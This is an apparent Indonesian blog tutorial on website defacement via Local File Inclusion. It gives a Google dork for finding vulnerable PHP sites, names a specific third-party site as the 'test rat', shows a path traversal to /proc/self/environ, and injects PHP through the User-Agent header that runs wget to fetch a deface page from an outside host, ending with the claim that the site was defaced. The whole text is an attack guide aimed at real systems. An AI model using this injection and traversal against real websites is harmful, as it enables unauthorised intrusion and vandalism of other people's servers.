Sebelumnya, apa itu LFI? "LFI adalah suatu celah yang dimana attacker nantinya akan bisa mengakses dan mengupload file di website tersebut dengan hanya melalui url"
Langsung ke pembahasan.
1. Pertama, kita cari target dulu di google dengan dork:
inurl:.php?page=contact.php
2. Pada tutorial ini web dengan url: http://www.heng-sieng.fr/heng-sieng.php?page=contact.php menjadi tikus percobaan kita.
3. Setelah membuka url tersebut. Cobalah ganti /heng-sieng.php?page=contact.php menjadi /heng-sieng.php?page=../../../../../../../../../../../proc/self/environ
Sehingga url berubah menjadi:
http://www.heng-sieng.fr/heng-sieng.php?page=../../../../../../../../../../../proc/self/environ
Kemudian tekan enter maka tampilan nya akan seperti ini:
Sekarang target udah ready dan siap untuk kita deface. Tapi bagaimana caranya? Oke ikutin langkah-langkah saya berikut ini:
4. Jalankan Tamper Data di Mozilla Firefox – Tools => Tamper Data
Ket: Buat yang belum ada silahkan di install dulu add-ons nya disini.
5. Start Tamper dan reload halaman target kita, maka akan muncul tampilan seperti ini:
6. Klik Tamper maka akan muncul form berikut ini seperti pada gambar:
7. Pada kolom User-Agent ganti dengan script berikut ini:
<?system('wget <url script deface kalian>');?>
Contoh:
<?system('wget http://www.sekiyur.com/ea.html');?>
Seperti pada gambar:
8. Kemudian klik Ok untuk menlanjutkan. Secara otomatis halaman target kita akan mereload dengan sendirinya.
9. Sekarang kita liat script deface kita tadi. Go to address: http://[patch]/namascriptkita.html atau .php
10. Sekarang cobalah buka http://www.heng-sieng.fr/ea.html. Taraaa, website has been defaced ^_^
Keterangan:
1. <?system('wget http://www.sekiyur.com/ea.html');?>
wget: Command untuk mengambil file di server lain.
http://www.sekiyur.com/ea.html: URL script deface kita.
ea.html: Nama script deface kita yang berextensi .html
Sumber thanks om teguh ^_^
No comments: